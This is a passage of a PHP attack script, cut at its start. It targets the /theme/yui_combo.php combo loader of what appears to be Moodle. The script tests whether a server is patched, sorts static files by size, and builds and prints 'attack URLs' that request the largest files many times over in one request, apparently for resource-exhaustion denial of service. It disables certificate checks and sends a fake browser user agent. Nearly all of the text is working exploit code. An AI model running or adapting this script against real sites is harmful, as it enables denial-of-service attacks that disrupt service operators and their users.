$files){ $testedPatch = true;$isPatched = true; $availableTypes[$type]=true; continue; $i=0; echo "Testing: $type\n"; foreach($files as $file){ if($i>3){break;} if(testRequest($systemUrl,$file['path'])){ //type is enable if(!$testedPatch){ //check if has patch $sizeOne = testRequest($systemUrl,$file['path'],true); if($sizeOne['size'] <= 1){ echo "is the webserver online ?\ndie";die; } if($forceExactSize){ if($sizeOne['size'] < $file['size'] - ( ($file['size']/10) * 2) ){ // if the size is less than 20 % of the stored size, maybe we have a problem; continue; } } $sizeTwo = testRequest($systemUrl,array($file['path'],$file['path']),true); if( (round($sizeTwo['size']/$sizeOne['size'])) == 2 ){ $testedPatch = true;$isPatched = false; }else{ $testedPatch = true;$isPatched = true; } } $availableTypes[$type]=true; break; } $i++; } } $filesMerged=array(); if(count($availableTypes)>0){ echo "Available Types :\n"; foreach($availableTypes as $type => $availableType){ echo $type."\n"; $filesMerged = array_merge($filesMerged,$filesM[$type]); } }else{ echo "None of the tested types works\n";die; } unset($filesM); if($isPatched){ echo "*** The tested WebServer IS patched ***\n"; }else{ echo "*** The tested WebServer IS NOT patched ***\n"; } echo "Available attack Urls ::: \n\n\n"; function cmp($a, $b) { return ($a['size'] > $b['size']) ? -1 : 1; } usort($filesMerged, "cmp"); /* Case : 25 of the biggest file */ if(!$isPatched){ $request = array(); $requestSize =0; for($i=0;$i<25;$i++){ $request[] = $filesMerged[0]['path'] ; $requestSize += $filesMerged[0]['size']; } if($testAvailableAttackUrls){ $result = testRequest($systemUrl,$request,$returnSize=true); if($result['httpCode'] != 404 ){ if($result['size'] > ($filesMerged[0]['size'] / 2)){ // echo the attack url echo "25 of the biggest file [{$requestSize}]:\n"; echoAttackUrl($request); } } }else{ // echo the attack url echo "25 of the biggest file [{$requestSize}]:\n"; echoAttackUrl($request); } } /* End Case : 25 of the biggest file */ /* Case : 25 biggest files */ if(!$isPatched){ $request = array(); $requestSize =0; for($i=0;$i<25;$i++){ $request[] = $filesMerged[$i]['path'] ; $requestSize += $filesMerged[$i]['size']; } if($testAvailableAttackUrls){ $result = testRequest($systemUrl,$request,$returnSize=true); if($result['httpCode'] != 404 ){ if($result['size'] > ($requestSize / 2)){ // echo the attack url echo "25 biggest files [{$requestSize}]:\n"; echoAttackUrl($request); }else{ echo "size\n"; } } }else{ // echo the attack url echo "25 biggest files [{$requestSize}]:\n"; echoAttackUrl($request); } } /* End Case : 25 biggest files */ /* Case : biggest files until 1024 */ if($isPatched){ $request = array(); $requestSize =0; $len=0; for($i=0;$i<50;$i++){ $len += strlen($filesMerged[$i]['path']); if($len > 1024){ $len = $len - strlen($filesMerged[$i]['path']); break; } $request[] = $filesMerged[$i]['path'] ; $requestSize += $filesMerged[$i]['size']; // print_r($filesMerged[$i]); $i++; } if($testAvailableAttackUrls){ $result = testRequest($systemUrl,$request,$returnSize=true); if($result['httpCode'] != 404 ){ if($result['size'] > ($requestSize / 2)){ // echo the attack url echo "biggest files until 1024 [{$requestSize}]:\n"; echoAttackUrl($request); }else{ echo "size\n"; } } }else{ // echo the attack url echo "biggest files until 1024 [{$requestSize}] [{$len}] [Files : {$i}]:\n"; echoAttackUrl($request); } die; } /* End Case : biggest files until 1024 */ function testRequest($systemUrl,$files,$returnSize=false){ if(is_array($files)){ $request="?".implode("&",$files); }else{ $request="?".$files; } $request = $systemUrl.'/theme/yui_combo.php'.$request; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $request); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); if($returnSize){ curl_setopt($ch, CURLOPT_HEADER, false); }else{ curl_setopt($ch, CURLOPT_HEADER, true); } curl_setopt($ch, CURLOPT_TIMEOUT, 60); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET'); curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $headers = array(); $headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0'; $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'; $headers[] = 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3'; $headers[] = 'Connection: close'; $headers[] = 'Upgrade-Insecure-Requests: 1'; $headers[] = 'Cache-Control: max-age=0'; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $result = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (curl_errno($ch)) { echo 'Error:' . curl_error($ch)."\n"; } curl_close($ch); if(!$returnSize){ if($httpCode != 404){ return true; }else{ return false; } }else{ $return['size'] = strlen($result); $return['httpCode'] = $httpCode; return $return; } } function echoAttackUrl($files){ global $systemUrl; $request="?".implode("&",$files); $request = $systemUrl.'/theme/yui_combo.php'.$request; // $request = str_replace("//","/",$request); echo $request."\n\n"; }